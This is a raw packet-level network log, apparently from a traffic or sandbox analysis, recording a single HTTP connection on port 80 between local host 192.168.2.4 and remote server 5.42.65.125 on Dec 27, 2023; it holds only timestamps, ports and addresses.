Dec 27, 2023 18:12:24.930048943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.930655956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.930668116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.930679083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.930691957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.930700064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.930725098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.930808067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.930820942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.930831909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.930845022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.930860996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.931529999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.931544065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.931580067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.931688070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.931699991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.931710958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.931723118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.931730986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.931745052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.931819916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.931838989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.931850910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.931862116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.931864023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.931888103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.932602882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.932615042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.932655096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.932782888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.932796001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.932807922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.932818890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.932825089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.932831049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.932842016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.932842970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.932869911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.933402061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.933414936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.933442116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.933588982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.933602095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.933613062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.933625937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.933630943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.933639050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.933655024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.933676004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.933763027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.934421062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.934432983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.934446096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.934459925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.934473038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.934499979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.934573889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.934586048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.934597015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.934608936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.934612036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.934638977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.935235023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.935246944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.935259104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.935270071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.935281992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.935281992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.935314894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.935332060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.935359955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.935373068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.935410023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.935549021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.936017036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.936029911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.936065912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.936212063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.936223984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.936235905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.936247110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.936249018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.936259985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.936270952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.936276913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.936295986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.936925888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937082052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937094927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937119961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937145948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937274933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937287092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937298059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937309980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937320948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937321901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937331915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937344074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937354088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937381029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937386036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937397957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937408924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937419891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937429905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937432051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937443018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937450886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937454939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937468052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937469006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937494993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937522888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937535048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937546015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937556982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937565088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937568903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937580109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937592030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937592030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937604904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937608957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937618017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937628984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937633991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937650919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937659979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937663078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937674999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937685966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937686920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937696934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937709093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937709093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937720060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937731981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937733889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937743902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937755108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937758923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937767982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937777996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937778950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937791109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937803984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937804937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937827110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937832117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937865973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937903881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937916040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937927008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937938929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937949896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937961102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.937983036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.937985897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.938005924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.938014984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.938747883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.938760996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.938793898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.938879013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.938911915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.938935995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.939004898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.939017057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.939028025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.939038992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.939049006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.939050913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.939062119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.939074993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.939088106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.939804077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.939815044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.939826965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.939838886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.939846992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.939876080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.939882040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.939894915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.939907074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.939913988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.939939022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.939939976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.940712929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.940820932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.940833092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.940844059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.940855980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.940857887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.940867901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.940880060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.940886021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.940892935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.940918922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.941576958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.941760063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.941771984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.941782951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.941793919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.941793919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.941807032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.941817999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.941822052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.941828966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.941854000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.947457075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947469950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947480917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947491884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947503090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947508097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.947515011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947526932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947537899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947539091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.947550058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947555065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.947563887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947576046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947586060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.947594881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947613001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947613001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.947626114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947637081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947643042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.947649002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947659969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947668076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.947670937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947684050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947702885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.947726965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.947766066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947778940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947789907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947801113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947808981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.947812080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947834969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.947886944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947900057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.947933912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.949198008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.949342012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.949352980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.949364901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.949381113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.949394941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.949466944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.949479103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.949490070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.949501038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.949528933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.949598074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.949879885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.949892044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.949903011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.949913979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.949922085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.949949026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.950010061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.950042009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.950191975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.950203896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.950215101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.950243950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.950850010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.950861931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.950872898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.950885057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.950885057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.950896978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.950911045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.950943947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.950977087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.950989962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951028109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951111078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951250076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951261997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951272964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951286077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951296091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951323032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951394081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951405048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951416016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951426029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951427937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951440096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951451063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951453924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951462984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951473951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951479912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951486111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951497078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951498032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951508999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951522112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951524973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951533079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951544046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951555014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951555014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951565027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951575994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951577902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951586962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951596975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951597929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951608896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951620102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951622009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951631069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951634884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951642990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951653004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951664925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951666117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951677084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951688051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951688051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951700926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951700926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951711893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951723099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951725960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951749086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951872110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951884985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951895952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951916933 CET	49738	80	192.168.2.4	5.42.65.125
